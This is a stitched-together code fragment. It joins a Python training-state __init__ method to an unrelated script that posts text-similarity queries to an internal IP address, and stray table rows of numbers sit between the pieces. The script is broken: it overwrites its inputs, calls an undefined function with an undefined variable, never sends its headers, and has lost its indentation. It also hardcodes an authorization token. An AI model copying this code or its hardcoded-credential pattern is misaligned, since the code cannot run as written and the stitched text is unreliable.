def __init__(self, **kwargs):
# data
self.device = None
self.input = None
self.output = None
self.loader = None
self.loader_mode = None
# counters
self.bs = 0
self.step = 0
self.epoch = 0
# metrics
self.lr = defaultdict(lambda: 0)
self.momentum = defaultdict(lambda: 0)
self.loss = None
self.epoch_metrics = None
self.best_metrics = None
# other
self.is_train = False
for k, v in kwargs.items():
setattr(self, k, v)
self._freeze()
| 820 | 251 |
#-*- coding: utf-8 -*-
import requests
import numpy as np
import json
import concurrent.futures
import codecs
with codecs.open('./test_1.txt', 'r', 'utf-8') as frobj:
input1 = frobj.read().strip()
with codecs.open('./candidate_1.txt', 'r', 'utf-8') as frobj:
candidate1 = frobj.read().strip()
with codecs.open('./test_2.txt', 'r', 'utf-8') as frobj:
input1 = frobj.read().strip()
with codecs.open('./candidate_2.txt', 'r', 'utf-8') as frobj:
candidate1 = frobj.read().strip()
post_data_1 = {
"data":{
"query":input1,
"candidate":[candidate1]
}
}
def create_http_session(config):
session = requests.Session()
a = requests.adapters.HTTPAdapter(max_retries=config.get("max_retries", 3),
pool_connections=config.get("pool_connections", 100),
pool_maxsize=config.get("pool_maxsize", 100))
session.mount('http://', a)
return session
session = create_http_session({})
def infer_data():
headers = {}
headers["Authorization"] = "ZWE5Y2FmNTgxMjA2NzdmOTJlOTEyMTllNmFkMTI4MDg4ZDk5OGMzYQ=="
response = requests.post("http://11.31.153.212:58756/api/predict/pi_text_similarity_match_v1_bj_90ebb4d6",
data=json.dumps(input_data))
results = (response.content)
return results
resp = infer(post_data_1)
print(resp)
| 1,262 | 564 |